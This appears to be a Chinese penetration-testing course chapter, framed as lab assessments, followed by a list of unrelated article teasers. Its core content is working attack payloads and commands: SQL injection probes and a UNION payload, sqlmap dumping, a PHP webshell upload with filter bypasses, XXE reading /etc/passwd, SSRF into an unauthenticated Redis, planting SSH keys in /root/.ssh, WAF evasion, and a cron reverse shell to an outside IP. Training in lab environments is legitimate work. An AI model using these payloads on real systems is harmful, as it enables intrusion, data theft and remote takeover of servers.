課程與考核

6.1 課程講解與實戰考核

6.1.1 SQL注入篇考核

考核目標:通過手動注入與工具結合,獲取目標數據庫敏感信息。

題目示例

  • 目標URL:http://vuln-site.com/product?id=1

  • 要求:

  1. 判斷注入類型(聯合查詢/報錯注入/布爾盲注)。

  2. 獲取數據庫名稱、表名及用戶密碼字段。

  3. 使用Sqlmap自動化驗證結果。

解題思路

  1. 探測注入點

http://vuln-site.com/product?id=1' AND 1=1-- // 正常響應 http://vuln-site.com/product?id=1' AND 1=2-- // 異常響應 
  1. 聯合查詢注入

' ORDER BY 3-- // 確定字段數為3 ' UNION SELECT 1,2,database()-- 
  1. Sqlmap自動化

sqlmap -u "http://vuln-site.com/product?id=1" --risk=3 --level=5 --dump 

6.1.2 文件上傳繞過考核

考核目標:繞過黑名單校驗上傳Webshell。

題目場景

  • 網站僅允許上傳.jpg文件,且檢測文件頭與Content-Type。

  • 目標:上傳PHP Webshell并觸發執行。

繞過步驟

  1. 文件頭偽造:在Webshell開頭添加GIF89a

  2. 雙擴展名繞過:命名文件為shell.jpg.php

  3. Burp修改Content-Type


POST /upload.php HTTP/1.1 Content-Type: multipart/form-data Content-Disposition: form-data; name="file"; filename="shell.jpg" Content-Type: image/jpeg <?php system($_GET['cmd']); ?> 

6.1.3 XXE與SSRF實戰考核

考核目標:利用XXE讀取服務器文件,并通過SSRF攻擊內網服務。

題目環境

  • 目標接口:XML數據解析端點(/api/parse)。

  • 內網存在未授權Redis服務(192.168.1.100:6379)。

解題步驟

  1. XXE讀取/etc/passwd

<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <data>&xxe;</data> 
  1. SSRF探測內網Redis

<!DOCTYPE test [<!ENTITY ssrf SYSTEM "http://192.168.1.100:6379">]> 
  1. Redis未授權寫SSH密鑰

redis-cli -h 192.168.1.100 flushall echo -e "\n\nssh-rsa AAAAB3NzaC... user@kali" | redis-cli -h 192.168.1.100 -x set payload redis-cli -h 192.168.1.100 config set dir /root/.ssh redis-cli -h 192.168.1.100 config set dbfilename "authorized_keys" redis-cli -h 192.168.1.100 save 

6.2 擴展知識與高階技巧

6.2.1 常見WAF繞過技巧

  • 分塊傳輸編碼

POST /login.php HTTP/1.1 Transfer-Encoding: chunked 7\r\n user=ad\r\n 6\r\n min&pass=1\r\n 0\r\n 
  • 注釋符混淆

' UN/**/ION SEL/**/ECT 1,2,3-- 

6.2.2 未授權漏洞實戰(Redis)

攻擊鏈

  1. 發現Redis未授權訪問:nmap -p 6379 192.168.1.0/24

  2. 寫入定時任務反彈Shell:


redis-cli -h 192.168.1.100 config set dir /var/spool/cron config set dbfilename root set payload "* * * * * bash -i >& /dev/tcp/1.2.3.4/4444 0>&1" save 

6.3 考核評分標準
  • 基礎分(60%):完成漏洞利用的核心步驟(如注入成功、文件上傳、權限獲取)。

  • 進階分(30%):繞過防御機制(如WAF、加密參數)。

  • 創新分(10%):提出新穎攻擊鏈或自動化腳本(如結合多個漏洞橫向移動)。


模擬考核環境搭建指南

  1. Docker快速部署漏洞靶場

docker run -d -p 80:80 vulnerables/web-dvwa 
  1. Kali工具集成:預裝Sqlmap、Burp Suite、CobaltStrike。

  2. 日志監控:使用ELK堆棧記錄攻擊行為,用于事后復盤。


下期預告

終章:綜合實戰演練——從信息收集到內網滲透,還原真實紅隊攻擊全流程!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/84121.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/84121.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/84121.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

線程池介紹,分類,實現(工作原理,核心組成,拒絕策略),固態線程池的實現+詳細解釋(支持超時取消機制和不同的拒絕策略)

目錄 線程池 介紹 分類 實現 工作原理 核心組成 拒絕策略 固態線程池 功能 std::future 實現 拒絕策略支持 提交任務 超時取消 用戶檢測取消 安全銷毀 代碼 測試 線程池 介紹 線程池(圖解,本質,模擬實現代碼),添加單例模式(懶漢思路代碼)_線程池單例-CSDN博…

紡線機與PLC通訊故障?ETHERCAT/CANopen網關秒解協議難題

在紡織行業智能化轉型浪潮中&#xff0c;設備間高效通信是實現自動化生產的關鍵。JH-ECT009疆鴻智能EtherCAT轉CANopen協議轉換網關&#xff0c;憑借出色的協議適配能力&#xff0c;成功架起倍福PLC與自動紡線機間的通信橋梁&#xff0c;為紡織廠自動化生產注入強勁動力。 紡織…

深度剖析并發I/O模型select、poll、epoll與IOCP核心機制

核心概要&#xff1a;select、poll、epoll 和 IOCP 是四種用于提升服務器并發處理能力的I/O模型或機制。前三者主要屬于I/O多路復用范疇&#xff0c;允許單個進程或線程監視多個I/O流的狀態&#xff1b;而 IOCP 則是一種更為徹底的異步I/O模型。 一、引言&#xff1a;為何需要這…

microsoft中word如何添加個人簽名

https://support.microsoft.com/zh-cn/office/%E6%8F%92%E5%85%A5%E7%AD%BE%E5%90%8D-f3b3f74c-2355-4d53-be89-ae9c50022730 插入簽名圖片 圖片格式選擇裁剪合適的大小 使用的簽名如果不是白色紙張的話可以重新著色 依次點擊圖片格式——顏色——重新著色——黑白50% 設置透…

linux初識--基礎指令

Linux下基礎指令 ls 指令 語法&#xff1a; ls [ 選項 ] [ ?錄或?件 ] 功能&#xff1a;對于?錄&#xff0c;該命令列出該?錄下的所有??錄與?件。對于?件&#xff0c;將列出?件名以及其他信 息。 常?選項&#xff1a; -a 列出?錄下的所有?件&#xff0c;包括以…

實戰:Dify智能體+Java=自動化運營工具!

我們在運營某個圈子的時候&#xff0c;可能每天都要將這個圈子的“熱門新聞”發送到朋友圈或聊天群里&#xff0c;但依靠傳統的實現手段非常耗時耗力&#xff0c;我們通常要先收集熱門新聞&#xff0c;再組裝要新聞內容&#xff0c;再根據內容設計海報等。 那怎么才能簡化并高…

RabbitMQ可靠傳輸——持久性、發送方確認

一、持久性 前面學習消息確認機制時&#xff0c;是為了保證Broker到消費者直接的可靠傳輸的&#xff0c;但是如果是Broker出現問題&#xff08;如停止服務&#xff09;&#xff0c;如何保證消息可靠性&#xff1f;對此&#xff0c;RabbitMQ提供了持久化功能&#xff1a; 持久…

(Java基礎筆記vlog)Java中常見的幾種設計模式詳解

前言&#xff1a; 在 Java 編程里&#xff0c;設計模式是被反復使用、多數人知曉、經過分類編目的代碼設計經驗總結。他能幫助開發者更高效地解決常見問題&#xff0c;提升代碼的可維護性、可擴展性和復用性。下面介紹Java 中幾種常見的設計模式。 單例模式&#xff08;Singlet…

(8)Spring Boot 原生鏡像支持

Spring Boot 原生鏡像支持 ?? 點擊展開題目 在Spring Boot 3.x中,如何設計一個支持GraalVM原生鏡像的微服務?需要特別注意哪些限制? ?? Spring Boot 3.x 原生鏡像概述 Spring Boot 3.x 通過 Spring Native 項目提供了對 GraalVM 原生鏡像的一流支持,使開發者能夠將 S…

不使用SOAP,從PDF表單連接數據庫

不使用SOAP協議&#xff0c;通過XFDF格式實現PDF表單與數據庫交互的方法。該方法兼容免費的Adobe Reader&#xff0c;且無需特殊權限設置。 背景與問題 歷史方案: Adobe曾提供ADBC接口&#xff08;基于ODBC&#xff09;&#xff0c;但在Acrobat 9后被移除。SOAP方案在免費版Rea…

HTTP由淺入深

文章目錄 概述特點URL HTTP 與 HTTPS概述HTTP 工作原理HTTPS 的作用區別總結 請求報文請求行常見請求方法請求頭請求體Content-Type 詳解常見場景 Content-Type 對應關系 響應報文響應行狀態碼詳解1xx&#xff1a;信息響應&#xff08;Informational&#xff09;2xx&#xff1a…

Redis淘汰策略

Redis有八種淘汰策略 noeviction &#xff1a;不進行淘汰&#xff0c;直接報錯。allkeys-lru &#xff1a;隨機淘汰最久未使用的鍵。volatile-lru &#xff1a;從設置了過期時間的鍵中&#xff0c;隨機淘汰最久未使用的鍵。allkeys-random &#xff1a;隨機淘汰某個鍵。volati…

Maven打包SpringBoot項目,因包含SpringBootTest單元測試和Java預覽版特性導致打包失敗

SpringBoot啟用Java預覽版特性&#xff08;無測試類&#xff09; 在pom.xml文件中加入以下配置表示啟用Java預覽版 <plugin><groupId>org.apache.maven.plugins</groupId><artifactId>maven-compiler-plugin</artifactId><configuration>…

Makefile快速入門

簡介?&#xff1a; ? Makefile? 是一種用于自動化構建和管理軟件項目的工具文件&#xff0c;通常與 make 命令配合使用。它通過定義?規則?&#xff08;rules&#xff09;來指定如何從源文件生成目標文件&#xff08;如可執行程序或庫&#xff09;&#xff0c;并自動…

RISC-V 開發板 MUSE Pi Pro OpenCV結合Gstreamer實時顯示CSI攝像頭

視頻講解&#xff1a;RISC-V 開發板 MUSE Pi Pro OpenCV結合Gstreamer實時顯示CSI攝像頭_嗶哩嗶哩_bilibili RISC-V 開發板 MUSE Pi Pro OpenCV結合Gstreamer實時顯示CSI攝像頭 安裝opencv相關庫 sudo apt install libopencv-dev python3 python3-opencv 測試使用的CSI攝像頭…

如何用JAVA手寫一個Tomcat

一、初步理解Tomcat Tomcat是什么&#xff1f; Tomcat 是一個開源的 輕量級 Java Web 應用服務器&#xff0c;核心功能是 運行 Servlet/JSP。 Tomcat的核心功能&#xff1f; Servlet 容器&#xff1a;負責加載、實例化、調用和銷毀 Servlet。 HTTP 服務器&#xff1a;監聽端口…

短劇系統開發與抖音生態融合:短視頻時代的新風口與商業機遇

在短視頻內容井噴的時代&#xff0c;“短劇”作為一種新興內容形態&#xff0c;正以驚人的速度搶占用戶注意力。抖音、快手等平臺日均播放量破億的短劇作品&#xff0c;不僅催生了新的內容創作風口&#xff0c;更推動了短劇系統開發的巨大市場需求。本文將深度解析短劇系統開發…

《云原生安全攻防》-- K8s日志審計:從攻擊溯源到安全實時告警

當K8s集群遭受入侵時&#xff0c;安全管理員可以通過審計日志進行攻擊溯源&#xff0c;通過分析攻擊痕跡&#xff0c;我們可以找到攻擊者的入侵行為&#xff0c;還原攻擊者的攻擊路徑&#xff0c;以便修復安全問題。 在本節課程中&#xff0c;我們將介紹如何配置K8s審計日志&am…

3dczml時間動態圖型場景

在cesium中我們了可以使用czml數據來生成可以隨時間變化而變化的物體. 首先導入czml數據 設置時間范圍 id: "point" //物體在什么時間范圍可用 availability:"2012-08-04T16:00:00Z/2012-08-04T16:05:00Z"position:{ //設置物體的起始時間 epoch:"…

超小多模態視覺語言模型MiniMind-V 訓練

簡述 MiniMind-V 是一個超適合初學者的項目&#xff0c;讓你用普通電腦就能訓一個能看圖說話的 AI。訓練過程就像教小孩&#xff1a;先準備好圖文材料&#xff08;數據集&#xff09;&#xff0c;教它基礎知識&#xff08;預訓練&#xff09;&#xff0c;再教具體技能&#xf…